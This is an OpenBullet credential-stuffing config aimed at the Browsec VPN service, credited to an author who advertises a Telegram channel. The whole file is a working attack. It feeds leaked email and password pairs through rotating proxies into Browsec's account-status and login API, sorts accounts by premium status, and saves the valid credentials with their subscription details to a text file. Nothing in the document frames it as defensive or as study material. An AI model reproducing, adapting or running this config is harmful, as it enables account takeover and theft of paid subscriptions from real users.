[SETTINGS]
{
  "Name": "Browsec VPN",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2020-11-17T04:42:47.7696418-08:00",
  "AdditionalInfo": "Telegram Channel : T.me/ghoulblack",
  "RequiredPlugins": [],
  "Author": "👑LilTOBA👑",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Credentials",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#EncodeUSER FUNCTION URLEncode "<USER>" -> VAR "US" 

#Get REQUEST GET "https://browsec.com/api/v1/users/status?email=<US>" 
  
  HEADER "Host: browsec.com" 
  HEADER "Connection: close" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.12.2" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"active\"}" 
  KEYCHAIN Failure OR 
    KEY "{\"status\":\"not_created\"}" 

#EncodePASS FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#Length FUNCTION Length "email=<US>&password=<PS>" -> VAR "Length" 

#Login REQUEST POST "https://browsec.com/api/v1/authentication" 
  CONTENT "email=<US>&password=<PS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Content-Length: <Length>" 
  HEADER "Host: browsec.com" 
  HEADER "Connection: close" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.12.2" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"ok\":false" 
  KEYCHAIN Success OR 
    KEY "{\"id\":\"" 

#Premium KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "premium\":false" 

#Premium PARSE "<SOURCE>" JSON "premium" CreateEmpty=FALSE -> CAP "Premium" 

#State PARSE "<SOURCE>" JSON "state" CreateEmpty=FALSE -> CAP "State" 

#Auto_Renewal PARSE "<SOURCE>" JSON "auto_renewal" CreateEmpty=FALSE -> CAP "Auto Renewal" 

UTILITY File "browsec.txt" AppendLines "<USER>: <PASS> | Premium = <premium> | State = <state> | Auto Renewal = <auto_renewal> //\\n =============================" 

